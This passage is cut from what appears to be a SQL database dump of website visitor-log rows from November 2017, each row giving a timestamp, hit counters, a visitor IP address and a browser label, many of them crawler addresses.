,0,'94.156.144.191','firefox'),(179357,1511167002,1,1,0,0,'37.9.113.182','other'),(179358,1511167215,1,1,0,0,'51.255.65.38','other'),(179359,1511167446,1,1,0,0,'8.29.198.25','other'),(179360,1511167754,1,1,0,0,'51.255.65.71','other'),(179361,1511167946,1,1,0,0,'37.9.113.182','other'),(179362,1511167970,1,1,0,0,'46.174.163.134','chrome'),(179363,1511168012,2,1,1,0,'66.249.64.29',''),(179364,1511168024,1,1,0,0,'91.196.178.65','chrome'),(179365,1511168110,1,1,0,0,'51.255.65.46','other'),(179366,1511168162,1,1,0,0,'92.113.126.165','chrome'),(179367,1511168313,1,0,1,0,'66.249.70.25',''),(179368,1511168402,2,1,1,0,'66.249.64.29',''),(179369,1511168410,1,1,0,0,'95.135.255.139','chrome'),(179370,1511168716,1,1,0,0,'66.249.64.29','chrome'),(179371,1511168887,1,1,0,0,'216.244.66.237','other'),(179372,1511169023,1,1,0,0,'217.182.132.95','other'),(179373,1511169093,1,1,0,0,'157.55.39.243','other'),(179374,1511169121,1,1,0,0,'91.196.178.65','chrome'),(179375,1511169190,1,1,0,0,'217.182.132.240','other'),(179376,1511169476,1,1,0,0,'95.132.62.193','firefox'),(179377,1511169923,1,1,0,0,'37.9.113.182','other'),(179378,1511169975,1,1,0,0,'51.255.65.3','other'),(179379,1511170074,1,1,0,0,'217.182.132.93','other'),(179380,1511170157,1,1,0,0,'51.255.65.31','other'),(179381,1511170198,1,1,0,0,'51.255.65.81','other'),(179382,1511170465,1,1,0,0,'217.182.132.149','other'),(179383,1511170492,1,1,0,0,'66.249.70.27','chrome'),(179384,1511170678,1,1,0,0,'137.74.207.120','other'),(179385,1511170977,1,1,0,0,'217.182.132.22','other'),(179386,1511171104,1,1,0,0,'91.196.178.65','chrome'),(179387,1511171337,1,1,0,0,'95.132.91.98','chrome'),(179388,1511171384,1,1,0,0,'51.255.65.63','other'),(179389,1511171770,1,0,1,0,'66.249.64.30',''),(179390,1511171774,1,1,0,0,'51.255.65.36','other'),(179391,1511171782,1,1,0,0,'91.196.179.33','firefox'),(179392,1511171799,1,1,0,0,'51.255.65.66','other'),(179393,1511172009,1,1,0,0,'207.46.13.178','other'),(179394,1511172015,1,1,0,0,'207.46.13.95','other'),(179395,1511172092,1,1,0,0,'111.33.8.67','chrome'),(179396,1511172135,1,1,0,0,'87.250.224.46','other'),(179397,1511172159,1,1,0,0,'91.196.178.135','firefox'),(179398,1511172255,1,1,0,0,'91.196.178.65','chrome'),(179399,1511172267,1,1,0,0,'217.182.132.85','other'),(179400,1511172295,1,1,0,0,'217.182.132.82','other'),(179401,1511172546,1,1,0,0,'37.9.113.182','other'),(179402,1511172618,2,1,1,0,'66.249.64.28',''),(179403,1511172646,1,1,0,0,'164.132.162.153','other'),(179404,1511172701,1,0,1,0,'66.249.70.27',''),(179405,1511172726,2,0,2,0,'66.249.70.25',''),(179406,1511173170,1,1,0,0,'95.132.62.193','firefox'),(179407,1511173250,1,1,0,0,'217.182.132.176','other'),(179408,1511173322,1,1,0,0,'91.196.178.65','chrome'),(179409,1511173346,1,1,0,0,'188.163.16.6','chrome'),(179410,1511173474,1,1,0,0,'51.255.65.30','other'),(179411,1511173613,1,1,0,0,'217.182.132.149','other'),(179412,1511173766,1,1,0,0,'178.154.171.88','other'),(179413,1511173777,1,1,0,0,'207.46.13.178','other'),(179414,1511173933,1,1,0,0,'141.8.142.74','other'),(179415,1511174192,1,1,0,0,'51.255.65.74','other'),(179416,1511174210,1,0,1,0,'66.249.64.29',''),(179417,1511174414,1,1,0,0,'87.250.224.46','other'),(179418,1511174651,1,1,0,0,'37.9.113.182','other'),(179419,1511174691,1,1,0,0,'178.154.171.88','other'),(179420,1511174694,1,1,0,0,'217.182.132.55','other'),(179421,1511174956,1,1,0,0,'92.113.126.165','chrome'),(179422,1511175209,1,1,0,0,'37.52.121.13','firefox'),(179423,1511175516,1,1,0,0,'51.255.65.32','other'),(179424,1511175619,1,1,0,0,'217.182.132.74','other'),(179425,1511175628,1,1,0,0,'66.249.70.27','chrome'),(179426,1511175644,1,1,0,0,'217.182.132.241','other'),(179427,1511175916,2,2,0,0,'178.154.171.88','other'),(179428,1511176078,1,1,0,0,'51.255.65.47','other'),(179429,1511176094,1,1,0,0,'141.8.142.74','other'),(179430,1511176131,1,1,0,0,'91.196.178.70','firefox'),(179431,1511176135,1,1,0,0,'51.255.65.52','other'),(179432,1511176438,1,1,0,0,'87.250.224.46','other'),(179433,1511176611,1,1,0,0,'51.255.65.72','other'),(179434,1511177709,1,1,0,0,'66.249.64.30','chrome'),(179435,1511177909,1,1,0,0,'91.196.178.163','chrome'),(179436,1511177978,2,2,0,0,'217.182.132.84','other'),(179437,1511178027,1,0,1,0,'66.249.70.27',''),(179438,1511178190,1,0,1,0,'66.249.64.29',''),(179439,1511178269,1,1,0,0,'51.255.71.115','other'),(179440,1511178276,1,1,0,0,'8.29.198.26','other'),(179441,1511178655,1,1,0,0,'141.8.142.74','other'),(179442,1511178825,1,0,1,0,'66.249.70.29',''),(179443,1511178841,7,7,0,0,'173.234.153.122','other'),(179444,1511179091,1,1,0,0,'178.154.171.88','other'),(179445,1511179157,1,1,0,0,'217.182.132.193','other'),(179446,1511179298,1,1,0,0,'66.249.70.29','chrome'),(179447,1511179440,1,1,0,0,'220.181.132.178','chrome'),(179448,1511179482,1,1,0,0,'182.118.20.143','chrome'),(179449,1511179510,1,1,0,0,'106.120.162.97','chrome'),(179450,1511180173,1,1,0,0,'157.55.39.243','other'),(179451,1511180240,1,0,1,0,'66.249.64.30',''),(179452,1511180693,1,1,0,0,'51.255.65.94','other'),(179453,1511180755,2,2,0,0,'91.196.178.67','chrome'),(179454,1511180764,1,1,0,0,'51.255.71.133','other'),(179455,1511180915,1,1,0,0,'51.255.71.121','other'),(179456,1511181127,1,1,0,0,'51.255.65.7','other'),(179457,1511181135,1,1,0,0,'46.201.56.230','chrome'),(179458,1511181199,1,1,0,0,'207.46.13.134','other'),(179459,1511181234,1,1,0,0,'217.182.132.84','other'),(179460,1511181409,1,1,0,0,'87.250.224.46','other'),(179461,1511181413,1,1,0,0,'141.8.142.74','other'),(179462,1511181884,1,1,0,0,'94.156.144.191','firefox'),(179463,1511181930,1,1,0,0,'51.255.65.46','other'),(179464,1511182094,1,0,1,0,'66.249.64.28',''),(179465,1511182098,1,1,0,0,'217.182.132.91','other'),(179466,1511182255,1,1,0,0,'217.182.132.75','other'),(179467,1511182517,1,1,0,0,'51.255.65.73','other'),(179468,1511182567,1,1,0,0,'37.54.82.158','chrome'),(179469,1511182775,1,1,0,0,'217.182.132.57','other'),(179470,1511183012,1,0,1,0,'66.249.64.28',''),(179471,1511183208,1,1,0,0,'66.249.64.30','chrome'),(179472,1511183246,1,1,0,0,'188.166.44.131','chrome'),(179473,1511183631,2,2,0,0,'91.210.110.167','chrome'),(179474,1511183856,1,1,0,0,'51.255.65.94','other'),(179475,1511184521,1,1,0,0,'199.58.86.209','other'),(179476,1511184537,1,1,0,0,'91.196.178.67','chrome'),(179477,1511184771,1,1,0,0,'66.249.70.27','chrome'),(179478,1511184791,1,1,0,0,'91.210.110.167','chrome'),(179479,1511184893,1,1,0,0,'91.196.177.46','firefox'),(179480,1511185014,2,2,0,0,'91.196.178.65','firefox'),(179481,1511185159,1,1,0,0,'51.255.65.43','other'),(179482,1511185374,1,1,0,0,'217.182.132.59','other'),(179483,1511185431,1,1,0,0,'51.255.65.95','other'),(179484,1511185616,1,1,0,0,'216.244.66.237','other'),(179485,1511185708,1,1,0,0,'91.196.178.136','chrome'),(179486,1511185759,2,2,0,0,'207.46.13.134','other'),(179487,1511185856,1,1,0,0,'87.250.224.46','other'),(179488,1511185871,1,0,1,0,'66.249.64.28',''),(179489,1511186098,1,1,0,0,'91.209.11.236','other'),(179490,1511186374,1,1,0,0,'51.255.65.87','other'),(179491,1511186512,1,1,0,0,'178.154.171.60','other'),(179492,1511186515,1,1,0,0,'37.9.113.132','other'),(179493,1511186644,1,1,0,0,'37.9.113.182','other'),(179494,1511187077,1,0,1,0,'66.249.70.27',''),(179495,1511187138,1,1,0,0,'180.76.15.152','other'),(179496,1511187195,1,1,0,0,'46.200.189.204','chrome'),(179497,1511187419,1,1,0,0,'31.43.18.150','chrome'),(179498,1511187467,2,2,0,0,'37.52.20.57','chrome'),(179499,1511187516,1,1,0,0,'217.182.132.149','other'),(179500,1511187618,1,1,0,0,'93.183.214.44','msie'),(179501,1511187651,1,1,0,0,'37.52.20.57','firefox'),(179502,1511187747,1,0,1,0,'66.249.64.28',''),(179503,1511187778,1,1,0,0,'51.255.65.37','other'),(179504,1511187876,1,1,0,0,'194.44.241.15','chrome'),(179505,1511187920,1,1,0,0,'51.255.71.125','other'),(179506,1511187971,1,1,0,0,'66.249.64.30','chrome'),(179507,1511188184,1,1,0,0,'51.255.65.2','other'),(179508,1511188206,1,1,0,0,'66.249.70.25','chrome'),(179509,1511188211,1,1,0,0,'164.132.164.180','other'),(179510,1511188397,1,1,0,0,'37.52.20.57','chrome'),(179511,1511188848,1,1,0,0,'37.52.20.57','firefox'),(179512,1511188885,1,1,0,0,'91.196.178.65','firefox'),(179513,1511188916,1,1,0,0,'91.196.178.162','chrome'),(179514,1511188920,1,1,0,0,'164.132.162.154','other'),(179515,1511189102,1,1,0,0,'8.29.198.26','other'),(179516,1511189213,1,1,0,0,'51.255.71.110','other'),(179517,1511189911,1,1,0,0,'92.112.249.148','chrome'),(179518,1511189958,1,0,1,0,'66.249.70.27',''),(179519,1511189979,1,1,0,0,'51.255.65.88','other'),(179520,1511190049,2,2,0,0,'217.182.132.28','other'),(179521,1511190552,1,1,0,0,'40.77.167.59','other'),(179522,1511190627,1,1,0,0,'217.182.132.30','other'),(179523,1511190831,1,1,0,0,'91.209.11.236','other'),(179524,1511191155,1,1,0,0,'217.182.132.51','other'),(179525,1511191247,1,1,0,0,'217.182.132.64','other'),(179526,1511191637,1,1,0,0,'51.255.65.71','other'),(179527,1511191853,1,1,0,0,'91.209.11.236','other'),(179528,1511192346,3,3,0,0,'141.8.142.74','other'),(179529,1511192448,1,1,0,0,'51.255.71.117','other'),(179530,1511192732,1,1,0,0,'207.46.13.134','other'),(179531,1511192972,2,0,2,0,'66.249.64.30',''),(179532,1511193104,1,1,0,0,'40.77.167.59','other'),(179533,1511193179,1,1,0,0,'109.63.153.211','chrome'),(179534,1511193764,1,1,0,0,'91.209.11.236','other'),(179535,1511193950,1,1,0,0,'178.154.171.88','other'),(179536,1511194058,1,1,0,0,'51.255.65.53','other'),(179537,1511194423,1,1,0,0,'217.182.132.28','other'),(179538,1511194457,1,1,0,0,'66.249.64.28','chrome'),(179539,1511194506,2,2,0,0,'66.249.70.25','chrome'),(179540,1511194642,1,0,1,0,'66.249.70.29',''),(179541,1511194917,1,1,0,0,'141.8.142.74','other'),(179542,1511194986,1,1,0,0,'91.209.11.236','other'),(179543,1511195928,1,1,0,0,'217.182.132.22','other'),(179544,1511196009,1,1,0,0,'51.255.71.116','other'),(179545,1511196075,2,2,0,0,'91.209.11.236','other'),(179546,1511196303,1,1,0,0,'51.255.65.34','other'),(179547,1511197133,1,1,0,0,'141.8.142.74','other'),(179548,1511197628,1,1,0,0,'51.255.71.117','other'),(179549,1511197669,4,4,0,0,'54.224.187.45','other'),(179550,1511197747,2,2,0,0,'91.209.11.236','other'),(179551,1511198189,1,1,0,0,'137.74.201.100','other'),(179552,1511198348,1,1,0,0,'51.255.65.35','other'),(179553,1511198550,1,1,0,0,'217.182.132.33','other'),(179554,1511198749,1,1,0,0,'217.182.132.63','other'),(179555,1511199118,1,1,0,0,'180.76.15.159','other'),(179556,1511199136,1,1,0,0,'51.255.65.17','other'),(179557,1511199259,1,1,0,0,'51.255.65.67','other'),(179558,1511199522,1,1,0,0,'66.249.64.28','chrome'),(179559,1511199587,1,1,0,0,'199.30.25.54','other'),(179560,1511199726,1,0,1,0,'66.249.64.29',''),(179561,1511199938,1,1,0,0,'8.29.198.26','other'),(179562,1511200456,1,1,0,0,'217.182.132.70','other'),(179563,1511200736,1,1,0,0,'51.255.71.98','other'),(179564,1511201253,1,1,0,0,'46.101.75.23','chrome'),(179565,1511201490,1,0,1,0,'66.249.70.29',''),(179566,1511201493,1,0,1,0,'66.249.70.27',''),(179567,1511201611,1,1,0,0,'217.182.132.16','other'),(179568,1511201651,1,1,0,0,'51.255.71.114','other'),(179569,1511201696,1,1,0,0,'158.69.225.33','other'),(179570,1511201723,1,1,0,0,'158.69.225.33','chrome'),(179571,1511201782,1,1,0,0,'207.46.13.178','other'),(179572,1511202103,1,1,0,0,'141.8.142.74','other'),(179573,1511202184,1,1,0,0,'195.238.108.89','firefox'),(179574,1511202450,1,0,1,0,'66.249.64.29',''),(179575,1511202483,1,0,1,0,'66.249.70.25',''),(179576,1511202586,1,1,0,0,'66.249.70.29','chrome'),(179577,1511202684,1,1,0,0,'51.255.71.129','other'),(179578,1511202706,1,1,0,0,'178.154.171.10','other'),(179579,1511203048,1,1,0,0,'66.249.64.28','chrome'),(179580,1511203166,1,1,0,0,'193.194.127.222','firefox'),(179581,1511203246,1,1,0,0,'217.182.132.67','other'),(179582,1511203441,1,1,0,0,'51.255.65.8','other'),(179583,1511203461,1,1,0,0,'217.182.132.22','other'),(179584,1511203705,1,1,0,0,'137.74.207.119','other'),(179585,1511203742,1,1,0,0,'51.255.65.48','other'),(179586,1511204040,1,1,0,0,'217.182.132.97','other'),(179587,1511204082,1,1,0,0,'193.194.127.222','firefox'),(179588,1511204496,1,1,0,0,'51.255.65.13','other'),(179589,1511204649,1,1,0,0,'46.211.101.101','chrome'),(179590,1511204753,1,1,0,0,'217.182.132.30','other'),(179591,1511204911,4,4,0,0,'91.209.11.236','other'),(179592,1511205030,1,1,0,0,'91.196.178.164','chrome'),(179593,1511205094,1,1,0,0,'164.132.162.157','other'),(179594,1511205236,1,1,0,0,'217.182.132.75','other'),(179595,1511205333,1,1,0,0,'217.182.132.59','other'),(179596,1511205644,1,0,1,0,'66.249.64.28',''),(179597,1511205750,1,0,1,0,'66.249.64.30',''),(179598,1511205889,1,1,0,0,'51.255.65.35','other'),(179599,1511206139,1,1,0,0,'137.74.207.159','other'),(179600,1511206167,1,1,0,0,'51.255.65.70','other'),(179601,1511206542,1,1,0,0,'217.182.132.29','other'),(179602,1511206666,1,1,0,0,'91.209.11.236','other'),(179603,1511207734,1,1,0,0,'51.255.65.17','other'),(179604,1511208194,1,1,0,0,'51.255.65.4','other'),(179605,1511208367,1,1,0,0,'51.255.71.132','other'),(179606,1511208387,1,1,0,0,'40.77.167.59','other'),(179607,1511208649,1,1,0,0,'66.249.70.29','chrome'),(179608,1511208731,1,1,0,0,'66.249.64.15','chrome'),(179609,1511208872,1,1,0,0,'217.182.132.90','other'),(179610,1511208984,1,1,0,0,'217.182.132.17','other'),(179611,1511209006,1,1,0,0,'176.8.141.224','chrome'),(179612,1511209145,1,1,0,0,'217.182.132.180','other'),(179613,1511209148,1,0,1,0,'66.249.70.27',''),(179614,1511209580,3,3,0,0,'91.209.11.236','other'),(179615,1511210107,1,1,0,0,'40.77.167.59','other'),(179616,1511210638,1,0,1,0,'66.249.64.30',''),(179617,1511210781,1,1,0,0,'8.29.198.26','other'),(179618,1511210799,1,1,0,0,'217.182.132.97','other'),(179619,1511211161,1,1,0,0,'91.209.11.236','other'),(179620,1511211416,1,1,0,0,'51.255.71.122','other'),(179621,1511211453,1,0,1,0,'66.249.70.29',''),(179622,1511211488,1,1,0,0,'178.154.171.88','other'),(179623,1511212682,1,1,0,0,'51.255.65.35','other'),(179624,1511213301,1,1,0,0,'66.249.70.27','chrome'),(179625,1511213303,1,1,0,0,'66.249.64.28','chrome'),(179626,1511213494,1,1,0,0,'51.255.65.95','other'),(179627,1511213864,1,1,0,0,'216.244.66.237','other'),(179628,1511214411,1,1,0,0,'217.182.132.29','other'),(179629,1511214423,1,1,0,0,'217.182.132.82','other'),(179630,1511215306,1,1,0,0,'217.182.132.61','other'),(179631,1511215308,1,1,0,0,'141.8.142.74','other'),(179632,1511215568,1,1,0,0,'51.255.65.88','other'),(179633,1511215571,1,1,0,0,'217.182.132.170','other'),(179634,1511215959,1,1,0,0,'51.255.65.51','other'),(179635,1511216044,1,1,0,0,'91.209.11.236','other'),(179636,1511216371,1,0,1,0,'66.249.70.25',''),(179637,1511216825,1,1,0,0,'51.255.65.49','other'),(179638,1511216845,1,1,0,0,'51.255.65.42','other'),(179639,1511216971,1,1,0,0,'91.209.11.236','other'),(179640,1511217080,1,1,0,0,'141.8.142.74','other'),(179641,1511217116,1,1,0,0,'176.77.0.90','msie'),(179642,1511217632,2,1,1,0,'66.249.64.29',''),(179643,1511217636,1,1,0,0,'66.249.70.29','chrome'),(179644,1511218421,1,0,1,0,'66.249.64.28',''),(179645,1511218447,2,0,2,0,'66.249.64.30',''),(179646,1511219142,1,1,0,0,'137.74.207.164','other'),(179647,1511219781,1,1,0,0,'217.182.132.157','other'),(179648,1511220024,1,1,0,0,'51.255.65.28','other'),(179649,1511220671,1,1,0,0,'91.209.11.236','other'),(179650,1511220790,1,1,0,0,'217.182.132.18','other'),(179651,1511220862,1,0,1,0,'66.249.64.28',''),(179652,1511221107,1,1,0,0,'217.182.132.64','other'),(179653,1511221244,1,1,0,0,'217.182.132.63','other'),(179654,1511221349,1,1,0,0,'178.154.200.32','other'),(179655,1511221491,1,0,1,0,'66.249.70.25',''),(179656,1511221562,1,1,0,0,'217.182.132.84','other'),(179657,1511221620,1,1,0,0,'8.29.198.27','other'),(179658,1511221630,1,1,0,0,'66.249.70.29','chrome'),(179659,1511221646,1,1,0,0,'66.249.70.25','chrome'),(179660,1511221812,1,1,0,0,'217.182.132.19','other'),(179661,1511221820,1,1,0,0,'51.255.71.119','other'),(179662,1511221915,1,1,0,0,'216.244.66.237','other'),(179663,1511222415,1,1,0,0,'217.182.132.4','other'),(179664,1511222707,1,1,0,0,'66.249.64.29','chrome'),(179665,1511222713,1,1,0,0,'66.249.70.27','chrome'),(179666,1511223062,1,1,0,0,'51.255.65.6','other'),(179667,1511223318,1,1,0,0,'141.8.142.74','other'),(179668,1511223414,1,1,0,0,'91.209.11.236','other'),(179669,1511223566,1,1,0,0,'144.76.12.66','other'),(179670,1511223567,1,1,0,0,'217.182.132.61','other'),(179671,1511223897,1,0,1,0,'66.249.64.28',''),(179672,1511223929,1,0,1,0,'66.249.70.25',''),(179673,1511224190,1,1,0,0,'137.74.207.114','other'),(179674,1511224512,1,1,0,0,'217.182.132.57','other'),(179675,1511224619,1,1,0,0,'141.8.142.74','other'),(179676,1511224710,3,3,0,0,'173.212.247.96','other'),(179677,1511224748,1,1,0,0,'217.182.132.6','other'),(179678,1511224790,1,1,0,0,'217.182.132.90','other'),(179679,1511225095,2,2,0,0,'91.209.11.236','other'),(179680,1511225219,1,1,0,0,'217.182.132.176','other'),(179681,1511225504,1,1,0,0,'51.255.71.123','other'),(179682,1511225833,1,1,0,0,'157.55.39.243','other'),(179683,1511226437,1,1,0,0,'51.255.65.76','other'),(179684,1511226482,2,2,0,0,'91.209.11.236','other'),(179685,1511226551,1,1,0,0,'217.182.132.151','other'),(179686,1511226661,1,1,0,0,'217.182.132.56','other'),(179687,1511227212,1,1,0,0,'213.180.203.7','other'),(179688,1511227366,1,1,0,0,'51.255.65.63','other'),(179689,1511228171,1,1,0,0,'217.182.132.95','other'),(179690,1511228398,1,1,0,0,'141.8.142.74','other'),(179691,1511228532,1,1,0,0,'66.249.64.29','chrome'),(179692,1511228548,1,1,0,0,'66.249.70.27','chrome'),(179693,1511229073,1,1,0,0,'217.182.132.157','other'),(179694,1511229672,1,1,0,0,'51.255.65.85','other'),(179695,1511229799,2,2,0,0,'141.8.142.74','other'),(179696,1511230268,1,1,0,0,'91.209.11.236','other'),(179697,1511230270,1,0,1,0,'66.249.64.28',''),(179698,1511230482,1,1,0,0,'51.255.65.41','other'),(179699,1511230623,1,1,0,0,'51.255.65.39','other'),(179700,1511230662,1,1,0,0,'51.255.65.75','other'),(179701,1511230756,1,1,0,0,'216.244.66.237','other'),(179702,1511230816,1,1,0,0,'51.255.65.32','other'),(179703,1511230899,1,1,0,0,'178.154.171.88','other'),(179704,1511231179,1,1,0,0,'40.77.167.59','other'),(179705,1511231210,1,1,0,0,'91.209.11.236','other'),(179706,1511231376,1,1,0,0,'51.255.65.56','other'),(179707,1511231389,1,1,0,0,'141.8.142.74','other'),(179708,1511231476,1,1,0,0,'51.255.71.123','other'),(179709,1511231621,1,0,1,0,'66.249.64.28',''),(179710,1511231983,1,1,0,0,'217.182.132.82','other'),(179711,1511232004,1,1,0,0,'207.46.13.178','other'),(179712,1511232447,1,0,1,0,'66.249.70.29',''),(179713,1511232453,1,1,0,0,'8.29.198.27','other'),(179714,1511232473,1,1,0,0,'178.154.171.88','other'),(179715,1511232502,2,2,0,0,'141.8.142.74','other'),(179716,1511232611,1,1,0,0,'217.182.132.173','other'),(179717,1511232649,1,1,0,0,'217.182.132.37','other'),(179718,1511232719,1,1,0,0,'178.154.200.32','other'),(179719,1511233503,1,1,0,0,'51.255.65.5','other'),(179720,1511233533,1,1,0,0,'217.182.132.59','other'),(179721,1511233624,1,1,0,0,'66.249.64.29','chrome'),(179722,1511233630,1,1,0,0,'66.249.70.27','chrome'),(179723,1511234026,1,1,0,0,'217.182.132.67','other'),(179724,1511234593,1,1,0,0,'137.74.207.164','other'),(179725,1511234698,1,0,1,0,'66.249.64.29',''),(179726,1511234729,1,0,1,0,'66.249.70.25',''),(179727,1511234980,2,2,0,0,'141.8.142.74','other'),(179728,1511235658,1,1,0,0,'178.154.171.88','other'),(179729,1511235665,1,1,0,0,'91.209.11.236','other'),(179730,1511235674,1,1,0,0,'66.249.64.30','chrome'),(179731,1511236709,3,3,0,0,'141.8.142.74','other'),(179732,1511236756,1,1,0,0,'137.74.207.188','other'),(179733,1511236823,1,1,0,0,'137.74.207.108','other'),(179734,1511236979,1,1,0,0,'217.182.132.4','other'),(179735,1511237068,1,1,0,0,'51.255.65.73','other'),(179736,1511237134,1,1,0,0,'217.182.132.85','other'),(179737,1511237238,1,1,0,0,'51.255.65.72','other'),(179738,1511238046,1,1,0,0,'51.255.71.101','other'),(179739,1511238536,1,1,0,0,'217.182.132.17','other'),(179740,1511239173,1,1,0,0,'217.182.132.23','other'),(179741,1511239256,1,1,0,0,'66.249.64.29','chrome'),(179742,1511239259,2,1,1,0,'66.249.70.27',''),(179743,1511239446,1,1,0,0,'51.255.71.125','other'),(179744,1511239572,1,1,0,0,'51.255.65.63','other'),(179745,1511239655,1,1,0,0,'51.255.65.11','other'),(179746,1511239944,1,1,0,0,'51.255.65.58','other'),(179747,1511240669,2,2,0,0,'141.8.142.74','other'),(179748,1511241348,1,1,0,0,'66.249.64.28','chrome'),(179749,1511241351,1,1,0,0,'66.249.64.30','chrome'),(179750,1511241387,1,0,1,0,'66.249.70.25',''),(179751,1511241430,1,1,0,0,'217.182.132.32','other'),(179752,1511241451,1,1,0,0,'51.255.71.122','other'),(179753,1511241639,1,1,0,0,'178.154.171.88','other'),(179754,1511241720,1,1,0,0,'37.9.113.115','other'),(179755,1511242370,1,1,0,0,'157.55.39.243','other'),(179756,1511242893,1,1,0,0,'217.182.132.187','other'),(179757,1511242916,1,1,0,0,'216.244.66.237','other'),(179758,1511243294,1,1,0,0,'8.29.198.25','other'),(179759,1511243629,1,1,0,0,'141.8.142.74','other'),(179760,1511243786,1,1,0,0,'217.182.132.64','other'),(179761,1511244316,1,1,0,0,'157.55.39.243','other'),(179762,1511244592,1,1,0,0,'66.249.64.29','chrome'),(179763,1511244598,1,1,0,0,'66.249.70.29','chrome'),(179764,1511244843,1,1,0,0,'66.249.64.28','chrome'),(179765,1511244859,1,0,1,0,'68.180.229.52',''),(179766,1511245161,1,1,0,0,'217.182.132.36','other'),(179767,1511245205,1,0,1,0,'66.249.70.27',''),(179768,1511245300,2,2,0,0,'178.154.171.88','other'),(179769,1511245451,1,1,0,0,'188.32.76.129','msie'),(179770,1511245466,1,1,0,0,'217.182.132.34','other'),(179771,1511245584,3,3,0,0,'91.209.11.236','other'),(179772,1511245997,1,1,0,0,'91.196.178.162','chrome'),(179773,1511246145,2,2,0,0,'91.196.178.65','chrome'),(179774,1511246332,1,1,0,0,'91.196.178.67','chrome'),(179775,1511246392,1,1,0,0,'217.182.132.55','other'),(179776,1511246544,1,1,0,0,'91.209.11.236','other'),(179777,1511246555,1,0,1,0,'66.249.64.28',''),(179778,1511246557,1,1,0,0,'217.182.132.151','other'),(179779,1511246566,1,1,0,0,'51.255.65.224','other'),(179780,1511246651,1,0,1,0,'66.249.64.30',''),(179781,1511246713,1,1,0,0,'91.196.178.65','firefox'),(179782,1511247026,1,1,0,0,'51.255.65.51','other'),(179783,1511247027,1,1,0,0,'91.196.178.70','chrome'),(179784,1511247419,1,1,0,0,'91.196.177.46','firefox'),(179785,1511247604,1,1,0,0,'91.209.11.236','other'),(179786,1511247882,1,1,0,0,'164.132.162.158','other'),(179787,1511247903,1,1,0,0,'217.182.132.94','other'),(179788,1511248172,1,1,0,0,'95.134.2.53','chrome'),(179789,1511248215,1,1,0,0,'51.255.65.67','other'),(179790,1511248461,1,1,0,0,'51.255.65.93','other'),(179791,1511248839,1,1,0,0,'217.182.132.150','other'),(179792,1511248863,1,1,0,0,'130.180.219.30','chrome'),(179793,1511248913,1,1,0,0,'37.204.107.219','chrome'),(179794,1511249072,1,1,0,0,'66.249.64.28','chrome'),(179795,1511249349,1,1,0,0,'40.77.167.59','other'),(179796,1511249466,2,2,0,0,'91.209.11.236','other'),(179797,1511249494,1,1,0,0,'207.46.13.134','other'),(179798,1511249647,1,1,0,0,'164.132.162.156','other'),(179799,1511250786,1,1,0,0,'217.182.132.25','other'),(179800,1511250794,1,1,0,0,'66.249.64.30','chrome'),(179801,1511250820,1,1,0,0,'66.249.70.25','chrome'),(179802,1511251060,1,1,0,0,'51.255.71.127','other'),(179803,1511251083,1,1,0,0,'137.74.207.109','other'),(179804,1511251444,1,1,0,0,'217.182.132.154','other'),(179805,1511251814,1,0,1,0,'66.249.70.25',''),(179806,1511251846,1,1,0,0,'51.255.65.91','other'),(179807,1511251906,1,1,0,0,'91.196.178.104','chrome'),(179808,1511252253,1,1,0,0,'51.255.71.128','other'),(179809,1511252638,1,1,0,0,'164.132.162.164','other'),(179810,1511253482,1,1,0,0,'91.196.178.65','firefox'),(179811,1511254136,1,1,0,0,'8.29.198.27','other'),(179812,1511254251,1,1,0,0,'51.255.65.33','other'),(179813,1511254258,1,1,0,0,'51.255.65.42','other'),(179814,1511254392,1,1,0,0,'91.196.177.15','chrome'),(179815,1511254528,1,1,0,0,'51.255.65.49','other'),(179816,1511254555,1,1,0,0,'207.46.13.134','other'),(179817,1511254861,1,1,0,0,'91.196.178.162','chrome'),(179818,1511254981,1,1,0,0,'66.249.64.30','chrome'),(179819,1511254994,1,1,0,0,'66.249.70.29','chrome'),(179820,1511255019,1,1,0,0,'51.255.71.111','other'),(179821,1511255157,1,1,0,0,'188.166.71.44','chrome'),(179822,1511255396,1,1,0,0,'66.249.64.28','chrome'),(179823,1511255433,1,1,0,0,'217.182.132.193','other'),(179824,1511255940,1,1,0,0,'178.154.171.88','other'),(179825,1511256186,1,1,0,0,'216.244.66.237','other'),(179826,1511256220,1,1,0,0,'217.182.132.67','other'),(179827,1511256244,1,1,0,0,'51.255.65.15','other'),(179828,1511256391,3,3,0,0,'54.165.59.7','other'),(179829,1511256560,1,1,0,0,'213.5.192.93','chrome'),(179830,1511256719,1,1,0,0,'67.190.118.9','chrome'),(179831,1511257047,1,1,0,0,'91.196.178.65','firefox'),(179832,1511257176,1,1,0,0,'217.182.132.177','other'),(179833,1511257364,1,0,1,0,'66.249.64.29',''),(179834,1511257389,1,1,0,0,'51.255.65.44','other'),(179835,1511257495,1,1,0,0,'91.196.177.15','chrome'),(179836,1511257951,1,1,0,0,'37.53.117.68','chrome'),(179837,1511257972,1,1,0,0,'137.74.201.99','other'),(179838,1511257977,1,1,0,0,'54.165.59.7','other'),(179839,1511258526,1,1,0,0,'217.182.132.156','other'),(179840,1511258550,1,0,1,0,'66.249.64.29',''),(179841,1511258579,1,1,0,0,'164.132.162.156','other'),(179842,1511258638,1,1,0,0,'217.182.132.64','other'),(179843,1511258800,1,1,0,0,'216.244.66.237','other'),(179844,1511258835,1,1,0,0,'51.255.71.113','other'),(179845,1511258928,39,39,0,0,'54.198.221.13','other'),(179846,1511259062,1,1,0,0,'51.255.71.122','other'),(179847,1511259701,1,1,0,0,'217.182.132.68','other'),(179848,1511259837,45,45,0,0,'54.198.221.13','other'),(179849,1511260384,1,1,0,0,'217.182.132.15','other'),(179850,1511260402,1,1,0,0,'91.196.177.46','firefox'),(179851,1511260791,1,1,0,0,'46.219.255.118','chrome'),(179852,1511260959,1,1,0,0,'66.249.64.29','chrome'),(179853,1511260962,1,1,0,0,'66.249.70.29','chrome'),(179854,1511261582,1,1,0,0,'137.74.207.108','other'),(179855,1511261742,1,1,0,0,'91.196.178.67','chrome'),(179856,1511261921,1,1,0,0,'164.132.162.156','other'),(179857,1511262089,1,1,0,0,'217.182.132.83','other'),(179858,1511262130,1,1,0,0,'51.255.65.4','other'),(179859,1511262400,1,1,0,0,'31.131.96.165','firefox'),(179860,1511262511,1,1,0,0,'51.255.65.10','other'),(179861,1511263089,1,1,0,0,'51.255.65.43','other'),(179862,1511263095,1,1,0,0,'178.154.171.88','other'),(179863,1511263118,1,1,0,0,'51.255.65.63','other'),(179864,1511263563,1,1,0,0,'51.255.65.59','other'),(179865,1511264041,1,0,1,0,'68.180.229.52',''),(179866,1511264309,1,1,0,0,'51.255.65.80','other'),(179867,1511264321,